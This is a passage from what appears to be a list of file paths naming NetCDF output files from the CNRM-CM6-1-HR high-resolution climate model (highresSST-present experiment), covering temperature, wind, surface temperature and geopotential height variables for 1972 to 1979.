'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197807010000-197807312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197808010000-197808312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197809010000-197809302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197810010000-197810312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197811010000-197811302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197812010000-197812312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197901010000-197901312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197902010000-197902282359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197903010000-197903312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197904010000-197904302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197905010000-197905312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197906010000-197906302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197907010000-197907312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197908010000-197908312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197909010000-197909302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197910010000-197910312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197911010000-197911302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197912010000-197912312359.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720301-19720331.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720701-19720731.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720901-19720930.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19721001-19721031.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730101-19730131.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730201-19730228.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730301-19730331.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730401-19730430.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730501-19730531.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730601-19730630.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730701-19730731.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730801-19730831.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730901-19730930.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19731001-19731031.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19731101-19731130.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19731201-19731231.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197207010000-197207312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197210010000-197210312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197212010000-197212312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197301010000-197301312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197302010000-197302282359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197303010000-197303312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197304010000-197304302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197305010000-197305312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197306010000-197306302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197307010000-197307312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197308010000-197308312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197309010000-197309302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197310010000-197310312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197311010000-197311302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197312010000-197312312359.nc',
'v20170518_1970/va_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197301-197312.nc',
'v20170518_1970/ts_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740101-19741231.nc',
'v20170518_1970/ts_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750101-19751231.nc',
'v20170518_1970/ts_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760101-19761231.nc',
'v20170518_1970/ts_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770101-19771231.nc',
'v20170518_1970/ts_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780101-19781231.nc',
'v20170518_1970/ts_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790101-19791231.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197401010000-197401312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197402010000-197402282359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197403010000-197403312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197404010000-197404302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197405010000-197405312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197406010000-197406302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197407010000-197407312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197408010000-197408312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197409010000-197409302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197410010000-197410312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197411010000-197411302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197412010000-197412312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197601010000-197601312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197501010000-197501312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197602010000-197602292359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197502010000-197502282359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197503010000-197503312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197603010000-197603312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197604010000-197604302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197504010000-197504302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197605010000-197605312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197505010000-197505312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197606010000-197606302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197506010000-197506302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197607010000-197607312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197507010000-197507312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197608010000-197608312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197508010000-197508312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197609010000-197609302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197509010000-197509302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197610010000-197610312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197510010000-197510312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197611010000-197611302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197511010000-197511302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197612010000-197612312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197512010000-197512312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197701010000-197701312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197702010000-197702282359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197703010000-197703312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197704010000-197704302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197705010000-197705312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197706010000-197706302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197707010000-197707312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197708010000-197708312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197709010000-197709302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197710010000-197710312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197711010000-197711302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197712010000-197712312359.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720301-19720331.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720401-19720430.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720801-19720831.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720901-19720930.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19721101-19721130.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730101-19730131.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730201-19730228.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197801010000-197801312359.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730301-19730331.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197802010000-197802282359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197803010000-197803312359.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730401-19730430.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197804010000-197804302359.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730501-19730531.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197805010000-197805312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197806010000-197806302359.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730601-19730630.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197807010000-197807312359.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730701-19730731.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197808010000-197808312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197809010000-197809302359.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730801-19730831.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197810010000-197810312359.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730901-19730930.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197811010000-197811302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197812010000-197812312359.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19731001-19731031.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197901010000-197901312359.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19731101-19731130.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197902010000-197902282359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197903010000-197903312359.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19731201-19731231.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197904010000-197904302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197905010000-197905312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197906010000-197906302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197907010000-197907312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197908010000-197908312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197909010000-197909302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197910010000-197910312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197911010000-197911302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197912010000-197912312359.nc',
'v20170518_1970/ua_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197401-197412.nc',
'v20170518_1970/ua_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197501-197512.nc',
'v20170518_1970/ua_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197601-197612.nc',
'v20170518_1970/ua_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197701-197712.nc',
'v20170518_1970/ua_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197801-197812.nc',
'v20170518_1970/ua_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197901-197912.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760101-19760131.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760201-19760229.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760301-19760331.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760401-19760430.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760501-19760531.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740101-19740131.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760601-19760630.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740201-19740228.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760701-19760731.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740301-19740331.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760801-19760831.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740401-19740430.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760901-19760930.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740501-19740531.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19761001-19761031.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740601-19740630.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19761101-19761130.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740701-19740731.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19761201-19761231.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740801-19740831.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770101-19770131.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740901-19740930.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770201-19770228.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720201-19720229.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19741001-19741031.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770301-19770331.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720301-19720331.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720601-19720630.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19741101-19741130.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770401-19770430.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730101-19730131.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19741201-19741231.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730201-19730228.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770501-19770531.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730301-19730331.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770601-19770630.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750101-19750131.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730401-19730430.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730501-19730531.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770701-19770731.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750201-19750228.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730601-19730630.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730701-19730731.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770801-19770831.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750301-19750331.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730801-19730831.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730901-19730930.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770901-19770930.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750401-19750430.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19731001-19731031.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19731101-19731130.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19771001-19771031.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750501-19750531.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19731201-19731231.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19771101-19771130.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750601-19750630.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720401-19720430.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19771201-19771231.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720501-19720531.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750701-19750731.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720701-19720731.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750801-19750831.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19721001-19721031.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750901-19750930.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19751001-19751031.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19721201-19721231.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19751101-19751130.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730101-19730131.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19751201-19751231.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730201-19730228.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730301-19730331.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730401-19730430.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730501-19730531.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730601-19730630.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730701-19730731.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730801-19730831.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730901-19730930.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19731001-19731031.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19731101-19731130.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19731201-19731231.nc',
'v20170518_1970/zg500_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197201010000-197212312359.nc',
'v20170518_1970/zg500_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197301010000-197312312359.nc',
